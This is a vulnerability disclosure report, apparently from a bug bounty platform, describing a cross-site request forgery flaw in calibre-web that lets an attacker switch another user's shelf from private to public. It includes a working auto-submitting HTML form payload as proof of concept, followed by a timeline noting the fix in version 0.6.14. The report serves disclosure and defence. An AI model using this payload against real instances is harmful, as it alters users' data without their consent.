Cross-Site Request Forgery (CSRF) in janeczku/calibre-web

Valid

Reported on

Sep 25th 2021


Description

csrf bug to chnage shelf from private to public

Proof of Concept

Bellow request is vulnerable to csrf attack

<form action="http://localhost:8083/shelf/edit/2" method="post" id="myForm2">
<input type="hidden" name="is_public" value="on">
<input type="hidden" name="title" value="asdad">
<input type="submit" value="Submit" id="test">
</form> 
<script>
document.getElementById("test").click();
</script>

Impact

csrf bug to change anyone shelf status from private to public

We have contacted a member of the janeczku/calibre-web team and are waiting to hear back 2 years ago
janeczku validated this vulnerability 2 years ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
janeczku marked this as fixed in 0.6.14 with commit 50919d 4 months ago
The fix bounty has been dropped
This vulnerability has now been published 4 months ago
to join this conversation